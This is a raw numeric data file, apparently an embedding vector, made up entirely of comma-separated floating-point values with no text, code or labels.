0.020248474553227425, -0.004649116192013025, 0.015156043693423271, 0.008366135880351067, -0.029342100024223328, 0.03331298381090164, 0.02841758169233799, -0.028690390288829803, -0.023704051971435547, 0.019884727895259857, 0.026250267401337624, -0.03513170778751373, -0.015913845971226692, -0.034828588366508484, 0.01996050961315632, 0.015512210316956043, -0.02715962938964367, -0.01498932670801878, -0.007812940515577793, 0.030903171747922897, -0.0317973792552948, 0.028508517891168594, -0.003019841620698571, 0.022264227271080017, -0.0023188746999949217, -0.014655893668532372, -0.01896020956337452, 0.050924304872751236, -0.017944755032658577, -0.06468599289655685, -0.019793791696429253, -0.020854715257883072, 0.008866284973919392, 0.017929598689079285, -0.03410109877586365, 0.02196110598742962, -0.028690390288829803, -0.034889210015535355, -0.00397467240691185, -0.01142765674740076, 0.03422234579920769, -0.0068315863609313965, -0.019642231985926628, -0.026765571907162666, -0.03828416392207146, 0.022961406037211418, 0.01576228439807892, -0.02916022762656212, 0.002616311889141798, -0.03698074445128441, -0.004940870217978954, -0.026932289823889732, -0.0334039181470871, 0.026022925972938538, -0.012064210139214993, 0.03343423083424568, 0.0022734066005796194, -0.030084745958447456, -0.011897494085133076, -0.009351278655230999, 0.005103797651827335, -0.0072673228569328785, 0.027690090239048004, 0.02071831189095974, 0.03613200783729553, 0.001279738382436335, -0.008798083290457726, 0.00533492723479867, 0.04137599840760231, 0.0032282371539622545, -0.0063844830729067326, 0.022688597440719604, -0.0038799471221864223, -0.02441638521850109, 0.03555607795715332, -0.02321905829012394, -0.01070016622543335, 0.00136878015473485, 0.06832344084978104, -0.013928404077887535, 0.006475419271737337, -0.02334030717611313, 0.018748026341199875, 0.006744439247995615, 0.004148966632783413, -0.020627375692129135, 0.016110874712467194, -0.004274004139006138, 0.00752876466140151, 0.030205994844436646, 0.01709601655602455, -0.006073784548789263, -0.02891772985458374, -0.008669257164001465, 0.030994107946753502, -0.0361926332116127, -0.019990820437669754, 0.023870768025517464, -0.03901165723800659, -0.012427955865859985, 0.013890514150261879, -0.014860500581562519, 0.0005948747275397182, 0.0182024072855711, -0.01764163374900818, -0.025249967351555824, 0.007680324837565422, 0.0016823208425194025, -0.006452685222029686, 0.01633821427822113, 0.0029213272500783205, 0.03491952270269394, 0.014655893668532372, -0.028644921258091927, 0.02223391644656658, 0.005702461116015911, -0.011480703018605709, 0.009396746754646301, -0.013291849754750729, 0.010397045873105526, 0.0005148318596184254, -0.014716518111526966, 0.019308799877762794, 0.03161550685763359, 0.03967852145433426, -0.03673825040459633, 0.04407377541065216, -0.0001097629065043293, 0.008851129561662674, -0.0011944856960326433, -0.0021521581802517176, 0.013102399185299873, 0.008555586449801922, -0.00791903305798769, 0.0188995860517025, -0.010048456490039825, -0.02235516346991062, -0.02523481287062168, 0.004592281300574541, -0.019869573414325714, 0.01947551593184471, -0.00857832096517086, -0.016323057934641838, 0.02359795942902565, -0.059805747121572495, -0.027129316702485085, -0.0013829889940097928, -0.007680324837565422, -0.010215173475444317, -0.004827199969440699, -0.026386670768260956, -0.036707937717437744, 0.006357959937304258, -0.01185960415750742, 0.028341801837086678, -0.03913290426135063, 0.0035351470578461885, 0.016929300501942635, -0.010442513972520828, -0.03904196619987488, 0.008813239634037018, -0.03355548158288002, 0.016186654567718506, -0.006717916112393141, -0.020293941721320152, 0.03304017335176468, -0.04983307048678398, 0.02234000712633133, -0.039526961743831635, -0.010722900740802288, -0.02215813472867012, 0.02083955891430378, -0.03191862627863884, -0.000370138994185254, -0.0010505032259970903, 0.03792041912674904, -0.01411785464733839, -0.02973615750670433, -0.03734448924660683, -0.0002541005378589034, -0.006361749023199081, 0.018111471086740494, 0.025644024834036827, 0.0008790505235083401, 0.01758101023733616, 0.00561531400308013, 0.030342398211359978, 0.0401938259601593, 0.010813836939632893, -0.021673141047358513, -0.00882081687450409, 0.024507321417331696, 0.01101844385266304, 0.009207296185195446, -0.03504077345132828, -0.005024228245019913, 0.020263629034161568, -0.0032225537579506636, 0.021794389933347702, -0.0031524570658802986, 0.015284869819879532, 0.014943858608603477, -0.01671711541712284, -0.005486487876623869, 0.0002647571382112801, -0.03434359282255173, 0.03066067583858967, -0.015390962362289429, 0.003131617559120059, 0.018566153943538666, 0.008282777853310108, -0.014383085072040558, -0.0007066504913382232, -0.06880843639373779, 0.02635635994374752, 0.04125475138425827, -0.04989369586110115, -0.002731876913458109, 0.02485591173171997, -0.041527558118104935, 0.031191136687994003, -0.06107885390520096, -0.019187550991773605, -0.02196110598742962, 0.030221151188015938, -0.02785680815577507, -0.05146992206573486, -0.00998025480657816, 0.03234299644827843, -0.05037868767976761, -0.018550997599959373, -0.024067796766757965, -0.02041519060730934, 0.052682407200336456, -0.0317973792552948, 0.03549545258283615, 0.025371216237545013, 0.02341608703136444, 0.04195192828774452, -0.010692588984966278, 0.006608034949749708, 0.0035370416007936, 0.006634558085352182, 0.02628057822585106, -0.00832824595272541, 0.02567433752119541, 0.019945353269577026, 0.022082354873418808, 0.0072862678207457066, 0.0014625581679865718, 0.0010883933864533901, -0.04692310839891434, 0.031827691942453384, -0.008805661462247372, -0.017611322924494743, -0.010290953330695629, -0.004099709913134575, 0.031948938965797424, 0.012102100998163223, 0.00005118124681757763, 0.013011462986469269, 0.034131407737731934, -0.048044655472040176, 0.00014504807768389583, -0.016944456845521927, 0.0006379747064784169, -0.01902083493769169, 0.03173675388097763, -0.019323954358696938, -0.04113350063562393, -0.030069589614868164, -0.01652008667588234, 0.02629573456943035, -0.008691990748047829, 0.04713529348373413, 0.01073805708438158, -0.012412799522280693, 0.05113648995757103, -0.034889210015535355, -0.015466742217540741, -0.031191136687994003, 0.03216112405061722, -0.022885626181960106, 0.016307903453707695, 0.009624087251722813, 0.022734064608812332, 0.006490575615316629, -0.010412202216684818, 0.0052894591353833675, 0.021991418674588203, 0.005149265751242638, 0.03404047340154648, -0.004433142486959696, -0.03504077345132828, -0.0030880437698215246, 0.012693186290562153, 0.0046907952055335045, 0.04249754548072815, -0.01351919025182724, -0.03473765030503273, -0.006752017419785261, 0.005558479111641645, -0.02909960225224495, 0.006596667692065239, -0.003743542591109872, -0.007483296561986208, -0.008214575238525867, 0.011594372801482677, 0.033009860664606094, -0.014792297966778278, 0.0025026416406035423, 0.006937678903341293, -0.03667762503027916, -0.008441915735602379, -0.02002113312482834, -0.004861300811171532, 0.01883896254003048, -0.03255518153309822, -0.015792597085237503, -0.013428254052996635, -0.0054751206189394, 0.007161230314522982, 0.006926311645656824, 0.012912948615849018, 0.013845045119524002, 0.013860201463103294, -0.01764163374900818, 0.013905669562518597, -0.01160952914506197, -0.009222452528774738, 0.014769564382731915, 0.02711416222155094, 0.014383085072040558, 0.00067491753725335, -0.02873585745692253, 0.008252465166151524, 0.020445503294467926, 0.04589249938726425, -0.02728087827563286, -0.010086346417665482, 0.04201255366206169, -0.007608333602547646, -0.0045165009796619415, -0.025113563984632492, -0.027583999559283257, -0.02165798656642437, -0.03995133191347122, -0.02097596414387226, -0.026492763310670853, 0.018808649852871895, -0.009601353667676449, 0.05140930041670799, 0.005065907258540392, -0.028766170144081116, 0.007596966810524464, -0.009654399938881397, 0.02811446040868759, -0.0013886725064367056, 0.022173291072249413, 0.005804764572530985, -0.013814733363687992, 0.010722900740802288, 0.00009851428330875933, -0.0331917330622673, -0.013814733363687992, -0.013375207781791687, 0.03325235843658447, -0.03185800462961197, 0.00017879395454656333, -0.004186857026070356, 0.000011426235687395092, -0.003216870129108429, -0.019172394648194313, -0.03231268376111984, 0.037890106439590454, -0.008843551389873028, 0.014064808376133442, -0.009442214854061604, 0.03561670333147049, -0.0015430746134370565, 0.013163023628294468, -0.020703155547380447, -0.0008132164366543293, -0.007229432463645935, -0.011162426322698593, 0.008911753073334694, 0.04413439705967903, 0.015140887349843979, 0.007043770980089903, -0.003584404243156314, 0.02922085113823414, 0.007259744685143232, 0.01952098309993744, -0.002930799964815378, 0.03467702865600586, 0.010192438960075378, -0.01583806611597538, 0.009563463740050793, -0.008063014596700668, 0.0024268613196909428, 0.01442855317145586, -0.020172692835330963, -0.0020081757102161646, 0.015383384190499783, -0.007237010635435581, 0.03373735398054123, -0.001116810948587954, 0.02223391644656658, -0.007153652608394623, 0.026401827111840248, -0.0007265428430400789, -0.008570742793381214, -0.014390663243830204, 0.0016169603914022446, -0.01833881251513958, 0.0008373713935725391, -0.010533450171351433, 0.0005465648137032986, -0.01752038672566414, 0.016201810911297798, -0.0057517183013260365, -0.035465139895677567, -0.0063655381090939045, -0.003127828473225236, 0.019172394648194313, -0.002532953629270196, -0.02621995471417904, 0.008563164621591568, -0.04186099022626877, -0.00016304587188642472, 0.026204798370599747, 0.008623789064586163, 0.0072824787348508835, -0.01997566595673561, 0.03622294217348099, -0.018808649852871895, -0.019248174503445625, -0.04298253729939461, 0.009624087251722813, 0.011132113635540009, 0.005634258966892958, -0.03989070653915405, 0.033646415919065475, -0.005486487876623869, 0.016671648249030113, 0.05171241983771324, -0.018232719972729683, 0.0034555778838694096, -0.0008653153199702501, 0.026129018515348434, -0.007911454886198044, 0.0002690197725314647, 0.005842654500156641, 0.017262732610106468, -0.04195192828774452, 0.023992016911506653, -0.021688297390937805, 0.01933911070227623, 0.028569141402840614, -0.016504930332303047, -0.027083849534392357, -0.002667463617399335, -0.003281283425167203, -0.036586686968803406, 0.03725355491042137, -0.00832824595272541, -0.036586686968803406, -0.029584595933556557, 0.006297335959970951, 0.03625325486063957, -0.013602549210190773, -0.01670195907354355, -0.0016737955156713724, -0.005236412864178419, 0.010321265086531639, -0.01921786367893219, 0.006460263393819332, -0.011215471662580967, 0.01452706754207611, 0.0001162752669188194, -0.015201511792838573, 0.01576228439807892, 0.017990224063396454, -0.0351923331618309, -0.03128207474946976, -0.015883533284068108, 0.004679428413510323, 0.007684113923460245, -0.008843551389873028, 0.025507621467113495, 0.051166802644729614, -0.026614012196660042, -0.02959975227713585, -0.0024836966767907143, -0.043103788048028946, 0.0063503822311758995, -0.012526470236480236, -0.006376905366778374, -0.0023453976027667522, -0.008972377516329288, -0.0000430703948950395, -0.03197925165295601, -0.004035296384245157, 0.018672244623303413, -0.021809546276926994, 0.03655637800693512, -0.017005080357193947, -0.010268219746649265, -0.005456175655126572, -0.009245186112821102, -0.012435533106327057, 0.016550399363040924, 0.010450092144310474, 0.006119252648204565, -0.009775647893548012, 0.0011925911530852318, -0.00449376692995429, -0.015929002314805984, 0.003531358204782009, -0.012458267621695995, -0.016307903453707695, -0.014618003740906715, -0.004092131741344929, 0.02723540924489498, 0.011389766819775105, 0.005797186400741339, 0.05647141858935356, -0.023370618000626564, -0.028872262686491013, 0.021809546276926994, -0.008866284973919392, 0.003620399860665202, -0.004952237010002136, -0.031069889664649963, 0.01645946316421032, -0.0034233713522553444, -0.022764377295970917, -0.0016880043549463153, 0.014731674455106258, -0.0009785119909793139, -0.002527270233258605, 0.024143576622009277, -0.0052894591353833675, 0.002536742715165019, 0.019566452130675316, -0.015747129917144775, 0.021370021626353264, -0.01803569123148918, -0.009722601622343063, 0.008926909416913986, -0.026341203600168228, -0.0015838064718991518, 0.02109721302986145, -0.02135486528277397, -0.03961789608001709, -0.02547730877995491, -0.007146074436604977, 0.008100905455648899, 0.01452706754207611, -0.005710039287805557, 0.0058843339793384075, 0.03367672860622406, 0.007324157748371363, -0.03655637800693512, -0.02497715875506401, -0.0008103746804408729, 0.014383085072040558, -0.006126830354332924, 0.032949239015579224, -0.006861898582428694, 0.00417927885428071, 0.015284869819879532, 0.013352474197745323, 0.0016415889840573072, 0.0037018635775893927, -0.013966294005513191, -0.03688981011509895, -0.005645626224577427, -0.02371920831501484, 0.01783866249024868, -0.011253362521529198, -0.02917538397014141, 0.001913450425490737, 0.023552490398287773, 0.03828416392207146, 0.0037662768736481667, -0.04125475138425827, -0.006145775783807039, -0.032009564340114594, 0.03567732498049736, 0.004683217499405146, 0.016747428104281425, -0.01858130842447281, 0.02109721302986145, -0.02421935647726059, 0.014193634502589703, -0.0016529560089111328, -0.015065107494592667, -0.004728685598820448, 0.012503735721111298, -0.014875656925141811, 0.018732869997620583, -0.029645221307873726, 0.008252465166151524, -0.019354267045855522, -0.02152158133685589, -0.013625282794237137, 0.012594671919941902, -0.007835674099624157, -0.02309780940413475, 0.01921786367893219, 0.018869273364543915, -0.02097596414387226, -0.030690988525748253, 0.006846742704510689, -0.05250053480267525, 0.031706441193819046, 0.014754408039152622, -0.028690390288829803, 0.016792895272374153, -0.0007791153620928526, -0.01689898781478405, 0.009608931839466095, 0.015049951151013374, -0.011154848150908947, 0.034131407737731934, -0.028766170144081116, -0.021733766421675682, -0.003826900850981474, 0.017868975177407265, -0.0009804065339267254, 0.012571938335895538, 0.0034423163160681725, 0.0009093625703826547, 0.022627972066402435, -0.018990522250533104, -0.03343423083424568, -0.022446099668741226, -0.007199120707809925, -0.026826197281479836, 0.021627673879265785, -0.0007047560065984726, 0.012056632898747921, -0.007744737900793552, 0.006986936088651419, 0.00788114219903946, -0.020172692835330963, -0.0011726988013833761, 0.00633901497349143, 0.014307305216789246, -0.02473466284573078, -0.011495858430862427, 0.03343423083424568, -0.03246424347162247, 0.005600158125162125, -0.007002091966569424, -0.05225803703069687, 0.04410408437252045, -0.048923708498477936, 0.006733072455972433, 0.011753511615097523, 0.01576228439807892, 0.022082354873418808, -0.01026064157485962, 0.005664571188390255, -0.013026619330048561, -0.0016444306820631027, -0.01433003880083561, 0.0341920331120491, 0.005990426056087017, -0.01695961318910122, 0.008995112031698227, 0.01903599128127098, -0.05683516338467598, -0.00763485673815012, -0.014034495688974857, -0.048469025641679764, 0.005694883409887552, -0.009487682953476906, 0.014534645713865757, -0.010821415111422539, 0.014367928728461266, 0.010025722905993462, 0.01946035958826542, 0.015625881031155586, -0.0034101097844541073, 0.024810442700982094, 0.0017448394792154431, -0.0071081845089793205, -0.017929598689079285, -0.0033153844997286797, 0.020794091746211052, -0.0027375603094697, 0.037768859416246414, 0.0012030109064653516, -0.016050249338150024, 0.0018604042707011104, 0.001005035126581788, -0.001447402173653245, 0.005134109873324633, -0.05571361631155014, -0.021506424993276596, -0.02635635994374752, -0.023082653060555458, -0.008775348775088787, -0.0018840855918824673, 0.026113862171769142, -0.014792297966778278, 0.028553985059261322, -0.008366135880351067, 0.003230131696909666, -0.0024192833807319403, -0.004133810754865408, -0.005342505406588316, 0.030281774699687958, -0.012306706979870796, -0.031130513176321983, 0.026507919654250145, -0.009502839297056198, 0.025765273720026016, -0.04186099022626877, -0.043225035071372986, -0.003783327294513583, 0.008585898205637932, -0.008350979536771774, -0.024234512820839882, -0.010351577773690224, 0.010927507653832436, 0.02617448754608631, -0.010442513972520828, -0.02811446040868759, 0.007157441228628159, -0.004539235029369593, -0.018475215882062912, -0.00976049154996872, 0.02102143131196499, -0.008373714052140713, -0.014026918448507786, -0.009146671742200851, 0.040284764021635056, 0.023673739284276962, -0.012708342634141445, 0.0255985576659441, 0.019490672275424004, -0.005441019777208567, -0.018005378544330597, -0.02909960225224495, -0.014420974999666214, -0.016307903453707695, -0.02473466284573078, 0.016929300501942635, 0.01233701966702938, 0.05337958410382271, -0.0011291252449154854, 0.0024495956022292376, 0.004721107427030802, 0.027629466727375984, 0.023249370977282524, -0.015868376940488815, -0.017505230382084846, 0.011624685488641262, -0.0007274900563061237, 0.013996605761349201, 0.004630171228200197, -0.015565256588160992, -0.013989027589559555, 0.024992315098643303, 0.01789928786456585, 0.006141986697912216, 0.014640738256275654, -0.02265828475356102, -0.004111076705157757, -0.03925415128469467, 0.0039064702577888966, 0.014254258945584297, -0.0022601450327783823, -0.00039784613181836903, -0.003211186733096838, 0.037708234041929245, -0.01815694011747837, 0.002993318485096097, -0.02535605989396572, -0.032403621822595596, -0.021688297390937805, -0.012609828263521194, -0.011412500403821468, -0.034525465220212936, -0.028644921258091927, 0.03792041912674904, -0.0062177665531635284, 0.020233318209648132, -0.036010757088661194, 0.003332434920594096, -0.006467841565608978, 0.023052342236042023, -0.004001195542514324, -0.024022327736020088, 0.010662276297807693, 0.01933911070227623, -0.0321914367377758, 0.005910857114940882, -0.033949535340070724, -0.035525765269994736, 0.0036507118493318558, -0.0182024072855711, -0.014890812337398529, 0.06535285711288452, 0.004126232583075762, 0.05086367949843407, -0.007551498711109161, -0.013307006098330021, -0.016550399363040924, -0.01111695822328329, 0.018687400966882706, -0.032009564340114594, 0.013049352914094925, -0.005698672495782375, -0.026523075997829437, 0.011389766819775105, 0.016474619507789612, 0.002978162607178092, -0.0020593274384737015, -0.022506725043058395, 0.01261740643531084, 0.008320667780935764, 0.023234214633703232, -0.052288349717855453, 0.0387994721531868, -0.00578960869461298, 0.012261238880455494, -0.025931989774107933, -0.029387567192316055, -0.03443453088402748, -0.04474063962697983, -0.016868676990270615, -0.013367630541324615, 0.01135945413261652, -0.004251270089298487, -0.004796887747943401, 0.01226881705224514, 0.0005503538413904607, -0.01142765674740076, 0.020354565232992172, 0.003895103232935071, -0.006926311645656824, -0.010578918270766735, 0.006967991124838591, -0.01126093976199627, 0.017929598689079285, -0.03167613223195076, 0.005039384588599205, 0.004141388926655054, 0.045225631445646286, -0.002466646023094654, -0.024128420278429985, 0.001083657145500183, 0.016050249338150024, 0.01045767031610012, 0.03598044812679291, -0.013420676812529564, 0.009108781814575195, 0.023112965747714043, 0.02003628946840763, 0.005797186400741339, -0.013367630541324615, -0.0075742327608168125, 0.02773555926978588, -0.01001056656241417, -0.014655893668532372, 0.017186952754855156, -0.0183994360268116, -0.014686206355690956, 0.0076045445166528225, 0.02621995471417904, 0.0010078768245875835, -0.04946932569146156, -0.018490372225642204, -0.002824707655236125, 0.008244887925684452, 0.010397045873105526, 0.017126329243183136, 0.009154249913990498, -0.0015838064718991518, 0.01615634188055992, -0.00010165205458179116, 0.04449814185500145, -0.0183994360268116, -0.0058994898572564125, -0.006016949191689491, -0.0035635647363960743, 0.02183985896408558, 0.020430346950888634, 0.0012873164378106594, -0.021172992885112762, -0.024764975532889366, 0.02347671054303646, -0.03810229152441025, -0.0220975112169981, -0.028068991377949715, -0.0013299428392201662, 0.01386777963489294, 0.009768069721758366, 0.015792597085237503, 0.011101801879703999, 0.023143278434872627, -0.015444007702171803, -0.01689898781478405, 0.011632263660430908, -0.017293045297265053, 0.023022029548883438, -0.006967991124838591, -0.006789907347410917, -0.022749220952391624, 0.012291551567614079, -0.023022029548883438, 0.0021066900808364153, 0.003853423986583948, -0.05350083112716675, 0.0074454061686992645, 0.006626979913562536, -0.026447296142578125, 0.013473722152411938, -0.01483776606619358, -0.026386670768260956, -0.027583999559283257, -0.020233318209648132, -0.040709130465984344, -0.02953912876546383, 0.00043952526175417006, 0.021324552595615387, 0.05134867504239082, 0.04095162823796272, -0.014223946258425713, -0.0017997801769524813, -0.01815694011747837, -0.0018632460851222277, -0.0063844830729067326, 0.0057214065454900265, 0.0018831384368240833, 0.003690496552735567, 0.034404218196868896, -0.00122858677059412, -0.009055735543370247, -0.0195967648178339, 0.015375806018710136, 0.007498452439904213, -0.0030690988060086966, -0.00599421514198184, -0.0026182064320892096, 0.010412202216684818, -0.0054334416054189205, 0.016989924013614655, 0.02415873296558857, -0.013125133700668812, -0.004713529255241156, -0.008343402296304703, 0.009427058510482311, -0.00916940625756979, -0.011632263660430908, 0.0040618195198476315, -0.009571040980517864, 0.00031306702294386923, -0.018945053219795227, 0.005225046072155237, 0.02729603461921215, -0.009328545071184635, 0.014489177614450455, -0.014845344237983227, -0.005653203930705786, -0.00037345438613556325, 0.010056034661829472, 0.0014710834948346019, -0.007146074436604977, -0.021248772740364075, -0.0051606325432658195, -0.030721299350261688, 0.03807198256254196, 0.0035162020940333605, -0.004944659303873777, -0.0141481664031744, -0.008548008278012276, -0.01355708111077547, 0.02083955891430378, 0.05125773698091507, -0.012844746932387352, 0.00394057109951973, -0.003607138292863965, 0.006642135791480541, -0.022264227271080017, -0.005221256986260414, -0.007263533771038055, 0.013056931085884571, 0.005850232671946287, -0.005225046072155237, 0.009131516329944134, -0.025431839749217033, -0.022764377295970917, 0.005865388549864292, 0.012390065006911755, 0.02997865341603756, 0.014314882457256317, 0.0021294241305440664, 0.017444605007767677, -0.005998004227876663, 0.010222751647233963, 0.042164113372564316, -0.010215173475444317, 0.0250984076410532, -0.03055458329617977, -0.024370918050408363, 0.016989924013614655, 0.018854117020964622, 0.002252566860988736, 0.007926610298454762, -0.01038946770131588, 0.026523075997829437, -0.00857832096517086, 0.005797186400741339, -0.010889616794884205, -0.016004782170057297, -0.002466646023094654, 0.009351278655230999, 0.013504034839570522, 0.0058843339793384075, -0.011268517933785915, 0.018687400966882706, 0.008206997066736221, -0.013003884814679623, -0.008661678992211819, -0.000600084604229778, -0.0027356657665222883, 0.007100606337189674, 0.034404218196868896, 0.01314028911292553, -0.005728984251618385, 0.002277195453643799, 0.016383683308959007, 0.002332136267796159, 0.0069604129530489445, 0.01195811852812767, -0.04343722015619278, -0.025810740888118744, -0.004126232583075762, -0.026614012196660042, -0.014595270156860352, -0.004683217499405146, -0.0007109131547622383, 0.0007113867904990911, -0.0026466241106390953, -0.020763779059052467, -0.024264825507998466, -0.019490672275424004, 0.013329739682376385, -0.001974074635654688, 0.00851011835038662, 0.010942663066089153, -0.017202109098434448, -0.00951799564063549, 0.03525295853614807, 0.036465439945459366, 0.02873585745692253, 0.02033941075205803, -0.00046202249359339476, -0.008532851934432983, 0.04225504770874977, -0.012473423965275288, 0.028447892516851425, -0.013989027589559555, 0.007081661373376846, -0.01483776606619358, -0.00916940625756979, 0.024628570303320885, 0.01865709014236927, 0.03443453088402748, 0.011882337741553783, -0.01242037769407034, -0.0020650108344852924, 0.016504930332303047, 0.009684711694717407, 0.014102698303759098, 0.000995562644675374, -0.005698672495782375, 0.014004183933138847, 0.02002113312482834, 0.0009107834775932133, -0.007684113923460245, 0.0019608130678534508, -0.027386970818042755, -0.00948010478168726, 0.009192139841616154, 0.012890215031802654, 0.022688597440719604, 0.022612815722823143, -0.00019975191389676183, -0.022749220952391624, 0.030190838500857353, 0.005903278943151236, -0.05541049316525459, -0.03873884677886963, -0.015595568343997002, 0.009427058510482311, -0.0069945137947797775, -0.010495560243725777, 0.0012465845793485641, 0.01257951557636261, 0.026947444304823875, -0.0017666262574493885, 0.004489977844059467, 0.0013678328832611442, -0.014481599442660809, -0.005581213161349297, 0.02991802990436554, -0.005221256986260414, -0.004171701148152351, 0.024992315098643303, -0.025431839749217033, 0.0018698768690228462, -0.005857810843735933, -0.009593775495886803, 0.02478013001382351, 0.005441019777208567, 0.03367672860622406, -0.03867822140455246, -0.026129018515348434, -0.04089100658893585, -0.02347671054303646, 0.003546514082700014, -0.0032888613641262054, -0.006418584380298853, 0.00910120364278555, -0.007460562512278557, 0.01351919025182724, -0.025507621467113495, 0.005171999800950289, -0.0032755997963249683, -0.04307347536087036, 0.028266020119190216, 0.024946847930550575, 0.006895999889820814, -0.002830391051247716, -0.025553088635206223, 0.009313388727605343, 0.015156043693423271, 0.008691990748047829, -0.007703058887273073, 0.002756505273282528, 0.020763779059052467, -0.016686804592609406, -0.0016453779535368085, -0.0025916832964867353, -0.027750715613365173, 0.015292447991669178, 0.011268517933785915, -0.008350979536771774, -0.006373116280883551, 0.020324254408478737, 0.030024122446775436, -0.009775647893548012, -0.0009406219469383359, 0.0024363340344280005, 0.003080465830862522, 0.013269116170704365, 0.04013320431113243, -0.016262434422969818, -0.00229992950335145, 0.0043876743875443935, 0.017429450526833534, 0.006429951172322035, 0.017702259123325348, -0.051742732524871826, 0.0009136252338066697, -0.027553686872124672, -0.022430943325161934, -0.004148966632783413, -0.02967553213238716, -0.00031401426531374454, 0.004107287619262934, 0.02177923358976841, 0.007271111942827702, 0.025446996092796326, -0.015747129917144775, 0.012640140019357204, -0.007487085182219744, -0.0033191735856235027, -0.0001342730683973059, 0.027341501787304878, 0.006278390996158123, -0.004649116192013025, 0.022582504898309708, 0.018823806196451187, 0.008896597661077976, -0.014868078753352165, -0.007661379873752594, -0.003224448300898075, -0.04392221197485924, 0.020051445811986923, -0.003510518465191126, -0.0034138988703489304, 0.005543322768062353, -0.004830988589674234, -0.009336122311651707, 0.010313687846064568, 0.03016052581369877, 0.005804764572530985, -0.02347671054303646, -0.005035595502704382, 0.0048347776755690575, -0.018172096461057663, -0.019854417070746422, 0.004649116192013025, -0.004277793224900961, 0.02717478573322296, 0.01633821427822113, -0.02728087827563286, 0.0037359646521508694, 0.010124237276613712, -0.02728087827563286, -0.01132914237678051, -0.010404624044895172, -0.015974469482898712, 0.006501942407339811, 0.014231524430215359, -0.004743841476738453, -0.006301125045865774, 0.019733168184757233, -0.012291551567614079, -0.018505528569221497, 0.045407507568597794, -0.014201212674379349, -0.011730777099728584, 0.017762882634997368, 0.01323880348354578, 0.019490672275424004, 0.01952098309993744, -0.024325449019670486, 0.007183964364230633, 0.0011613317765295506, -0.022946249693632126, 0.013731375336647034, 0.010177282616496086, 0.0282963328063488, -0.021627673879265785, 0.0061988215893507, -0.014602847397327423, 0.010525871999561787, 0.011185159906744957, -0.006740650162100792, 0.017353668808937073, -0.013807155191898346, -0.013261537998914719, 0.015360649675130844, 0.005103797651827335, -0.024052640423178673, -0.05841138958930969, -0.011086645536124706, -0.004747630562633276, 0.014390663243830204, 0.0008203208562918007, 0.0066572921350598335, -0.006983147002756596, 0.006297335959970951, 0.017186952754855156, 0.019930196925997734, 0.0036374502815306187, 0.009131516329944134, 0.000796165899373591, 0.010306109674274921, 0.01323880348354578, -0.013526768423616886, -0.022931093350052834, -0.011420078575611115, 0.03655637800693512, 0.002769766841083765, -0.0036526063922792673, 0.011700465343892574, 0.0007047560065984726, 0.02141548879444599, 0.023173591122031212, 0.008214575238525867, -0.0227946899831295, -0.03167613223195076, -0.018732869997620583, -0.006805063225328922, 0.021945951506495476, 0.015300026163458824, 0.007369625847786665, 0.01803569123148918, -0.008964799344539642, 0.016489775851368904, -0.016444306820631027, -0.01871771365404129, -0.002396549331024289, 0.021885326132178307, 0.0028322855941951275, 0.0012409010669216514, 0.015072684735059738, -0.022052042186260223, 0.002616311889141798, -0.008964799344539642, -0.026083551347255707, -0.019263330847024918, 0.0215973611921072, 0.013973872177302837, 0.011086645536124706, 0.008138795383274555, 0.007956922985613346, 0.0311002004891634, -0.018429748713970184, -0.009320966899394989, 0.033646415919065475, 0.011344298720359802, -0.006797485519200563, 0.0012731075985357165, 0.0125492038205266, -0.019672544673085213, -0.0040807644836604595, -0.005505432840436697, 0.0009647769038565457, -0.016853520646691322, 0.005691094323992729, 0.013064509257674217, 0.01007876917719841, -0.0005977164837531745, 0.04595312476158142, 0.011351876892149448, 0.0025121141225099564, 0.018369125202298164, 0.0026750415563583374, -0.02141548879444599, -0.009328545071184635, 0.013776843436062336, 0.02609870582818985, -0.02805383689701557, 0.017565853893756866, 0.02473466284573078, -0.018247876316308975, 0.01977863721549511, -0.017202109098434448, 0.01677774079144001, 0.0013195229694247246, 0.017065703868865967, 0.014133010059595108, 0.03173675388097763, 0.0021748922299593687, -0.0038325844798237085, -0.027583999559283257, -0.005463753826916218, -0.012412799522280693, -0.02717478573322296, 0.00015262608940247446, -0.0033911645878106356, 0.02315843477845192, -0.020945651456713676, 0.002406021812930703, 0.012465845793485641, -0.018808649852871895, 0.009184562601149082, -0.01111695822328329, 0.002671252703294158, 0.011063911952078342, 0.006157142575830221, 0.034828588366508484, 0.017732569947838783, 0.0157016608864069, 0.0004944659303873777, -0.012230927124619484, -0.009851427748799324, 0.0008458966622129083, 0.0016927405958995223, 0.0023624482564628124, 0.005107586737722158, 0.002584105357527733, -0.014542223885655403, 0.012291551567614079, 0.005441019777208567, -0.011336720548570156, -0.012693186290562153, -0.018793493509292603, 0.006320070009678602, 0.0006545516080223024, 0.03443453088402748, -0.0009832483483478427, -0.004023929592221975, 0.009336122311651707, 0.0069452570751309395, -0.008585898205637932, 0.0066572921350598335, 0.0004987285356037319, -0.0009117307490669191, -0.012185459025204182, 0.02867523394525051, -0.015110575594007969, 0.012049054726958275, -0.010427357628941536, 0.004736263304948807, 0.0222945399582386, -0.006293546874076128, -0.015671348199248314, -0.009737757965922356, -0.02171861007809639, 0.027326345443725586, -0.01317817997187376, 0.01815694011747837, -0.009972676634788513, 0.014701361767947674, 0.013860201463103294, -0.024234512820839882, -0.013920825906097889, 0.0022355164401233196, 0.0009699867805466056, 0.003510518465191126, -0.01248100120574236, 0.005202312022447586, -0.005016650538891554, 0.01376926526427269, 0.03149425983428955, 0.006604245863854885, 0.01947551593184471, -0.0022790899965912104, 0.010093924589455128, -0.0034328438341617584, -0.009131516329944134, 0.006013160105794668, 0.02828117646276951, 0.01501963846385479, 0.006566355936229229, -0.006680026184767485, 0.013663172721862793, 0.024067796766757965, -0.014292148873209953, 0.0066724480129778385, -0.01677774079144001, 0.00916940625756979, -0.0005602999590337276, 0.02553793229162693, -0.009048158302903175, 0.002447701059281826, -0.0023112965282052755, 0.011556482873857021, -0.009154249913990498, 0.009995410218834877, 0.014420974999666214, 0.003207397647202015, 0.008964799344539642, -0.007540131453424692, 0.008419182151556015, -0.01752038672566414, -0.003607138292863965, -0.026583699509501457, -0.007187753450125456, 0.006789907347410917, 0.006066206376999617, 0.010760790668427944, -0.02146095782518387, 0.0074264612048864365, -0.001145228510722518, -0.005876755807548761, 0.003690496552735567, -0.0069793579168617725, -0.005240201950073242, 0.0018073581159114838, -0.016550399363040924, -0.0027205098886042833, -0.014731674455106258, 0.0033911645878106356, -0.001819672412239015, 0.009722601622343063, -0.002593577839434147, 0.010897194966673851, -0.013322162441909313, 0.0035484086256474257, -0.02465888299047947, 0.004702162463217974, 0.0045998590067029, 0.006407217122614384, -0.01658071205019951, -0.003671551588922739, -0.029523972421884537, -0.008282777853310108, 0.025765273720026016, 